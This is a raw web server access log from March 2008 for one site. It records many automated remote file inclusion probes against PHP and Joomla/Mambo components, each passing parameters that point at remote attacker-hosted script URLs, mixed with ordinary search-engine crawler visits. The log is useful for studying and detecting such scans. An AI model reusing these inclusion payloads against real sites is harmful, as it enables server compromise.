80.67.20.173 - - [04/Mar/2008:04:31:49 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.38.15.70 - - [04/Mar/2008:04:32:44 -0800] "GET //index.php?option=com_content&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
61.38.15.70 - - [04/Mar/2008:04:32:44 -0800] "GET /logs//index.php?option=com_content&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:04:32:49 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://deniamusic.com/keplek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.166.170.10 - - [04/Mar/2008:04:32:57 -0800] "GET /!scanhttp://globalenvoy.com//12all/admin/images/admin/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.166.170.10 - - [04/Mar/2008:04:32:58 -0800] "GET /logs/!scanhttp://globalenvoy.com//12all/admin/images/admin/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:04:33:16 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.166.170.10 - - [04/Mar/2008:04:33:19 -0800] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://globalenvoy.com//12all/admin/images/admin/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.166.170.10 - - [04/Mar/2008:04:33:26 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://globalenvoy.com//12all/admin/images/admin/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:04:34:16 -0800] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.102.131.114 - - [04/Mar/2008:04:34:30 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.102.131.114 - - [04/Mar/2008:04:34:34 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.102.131.114 - - [04/Mar/2008:04:34:46 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:04:34:52 -0800] "GET /mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:04:34:52 -0800] "GET /logs/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:04:35:17 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:04:35:27 -0800] "GET /!scanhttp://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:04:35:27 -0800] "GET /logs/!scanhttp://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:04:35:28 -0800] "GET /logs/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:04:35:28 -0800] "GET /mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.6.25.156 - - [04/Mar/2008:04:35:38 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:04:35:49 -0800] "GET /logs/access_080211.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:04:35:50 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.25.68.146 - - [04/Mar/2008:04:36:25 -0800] "GET //include/write.php?dir=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.25.68.146 - - [04/Mar/2008:04:36:25 -0800] "GET /logs//include/write.php?dir=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.6.24.203 - - [04/Mar/2008:04:36:59 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.95 - - [04/Mar/2008:04:37:19 -0800] "GET /logs/access_080211.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:04:37:22 -0800] "GET /logs/access_080103.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.3 - - [04/Mar/2008:04:37:47 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/0nepiece/one.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:39:02 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:39:02 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:39:03 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:39:33 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.115 - - [04/Mar/2008:04:40:28 -0800] "GET /logs/access_071105.log HTTP/1.1" 200 54880 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.30.179.200 - - [04/Mar/2008:04:40:34 -0800] "GET /minamijewelry/html/clearance.html HTTP/1.0" 200 12257 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.73.115 - - [04/Mar/2008:04:40:35 -0800] "GET /logs/access_070828.log HTTP/1.1" 200 86379 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.55.148.27 - - [04/Mar/2008:04:40:40 -0800] "GET /p.php?p=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:41:11 -0800] "GET /logs/access_080215.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:41:11 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:41:17 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:04:41:25 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:04:41:25 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:41:47 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:04:42:54 -0800] "GET /logs//admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:04:42:54 -0800] "GET //admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:04:43:10 -0800] "GET /logs/access_080211.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:04:43:15 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.115 - - [04/Mar/2008:04:43:21 -0800] "GET /logs/access_070901.log HTTP/1.1" 200 28607 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:43:33 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:43:33 -0800] "GET /admin.php?include_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:43:38 -0800] "GET /logs/admin.php?include_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:43:39 -0800] "GET /logs/access_080216.log/admin.php?include_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:45:23 -0800] "GET /logs/access_071214.log/admin.php?include_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [04/Mar/2008:04:46:00 -0800] "GET /logs/access_080123.log/admin.php?include_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:04:46:14 -0800] "GET /logs/access_080103.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:04:46:30 -0800] "GET //errors.php?error=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:04:46:30 -0800] "GET /logs//errors.php?error=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.55.148.27 - - [04/Mar/2008:04:46:37 -0800] "GET /logs/access_080211.log/p.php?p=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [04/Mar/2008:04:46:37 -0800] "GET /logs/p.php?p=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [04/Mar/2008:04:46:38 -0800] "GET /logs/access_080117.log/p.php?p=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.237 - - [04/Mar/2008:04:47:20 -0800] "GET /logs/access_070830.log HTTP/1.0" 200 30370 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.142.220.82 - - [04/Mar/2008:04:47:41 -0800] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [04/Mar/2008:04:47:42 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [04/Mar/2008:04:47:42 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:04:48:08 -0800] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:04:48:19 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:04:48:20 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:04:48:23 -0800] "GET /logs/access_080211.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:04:48:23 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:04:48:27 -0800] "GET /admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:04:48:27 -0800] "GET /logs/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.145.200 - - [04/Mar/2008:04:48:43 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.200 - - [04/Mar/2008:04:48:44 -0800] "GET /minamijewelry/html/testimonials.html HTTP/1.0" 200 12445 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
72.30.214.232 - - [04/Mar/2008:04:48:50 -0800] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:04:48:55 -0800] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.leakdoctor.co.kr/shop/pro/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:04:48:55 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.leakdoctor.co.kr/shop/pro/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:04:48:56 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.leakdoctor.co.kr/shop/pro/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:04:49:26 -0800] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://deniamusic.com/keplek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:04:49:26 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://deniamusic.com/keplek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:04:49:50 -0800] "GET /logs/access_080216.log/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.108 - - [04/Mar/2008:04:49:58 -0800] "GET /minamijewelry/?S=D HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:04:50:35 -0800] "GET /logs/access_080103.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:04:51:29 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.leakdoctor.co.kr/shop/pro/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.108 - - [04/Mar/2008:04:51:54 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:04:51:58 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://deniamusic.com/keplek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.102 - - [04/Mar/2008:04:52:07 -0800] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.176 - - [04/Mar/2008:04:52:22 -0800] "GET /logs/access_080122.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:04:52:33 -0800] "GET /logs/index.php?page=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
77.221.130.3 - - [04/Mar/2008:04:52:34 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/0nepiece/one.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:04:52:34 -0800] "GET /index.php?page=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
77.221.130.3 - - [04/Mar/2008:04:52:34 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/0nepiece/one.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.152 - - [04/Mar/2008:04:55:12 -0800] "GET /retreat1/webcam/?N=D HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:04:59:22 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.137 - - [04/Mar/2008:05:00:07 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.0" 200 1814141 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:05:01:50 -0800] "GET /logs//public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:05:01:50 -0800] "GET //public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:05:01:55 -0800] "GET /logs/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:05:01:55 -0800] "GET /index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.6.28.164 - - [04/Mar/2008:05:01:58 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.60 - - [04/Mar/2008:05:02:13 -0800] "GET /logs/access_080103.log HTTP/1.0" 200 448825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.148.182.6 - - [04/Mar/2008:05:02:28 -0800] "GET /logs/access_080117.log/start.php?s=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.148.182.6 - - [04/Mar/2008:05:02:28 -0800] "GET /start.php?s=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.148.182.6 - - [04/Mar/2008:05:02:28 -0800] "GET /logs/start.php?s=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:05:02:35 -0800] "GET /index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:05:02:39 -0800] "GET /logs/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:02:42 -0800] "GET /confirm.php?include_location=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:05:02:45 -0800] "GET /logs/admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:05:02:45 -0800] "GET /admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
71.6.167.234 - - [04/Mar/2008:05:03:18 -0800] "GET /logs/SQuery/lib/flashpoint.php?libpath=http://www.nedaleko.ru/en/img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
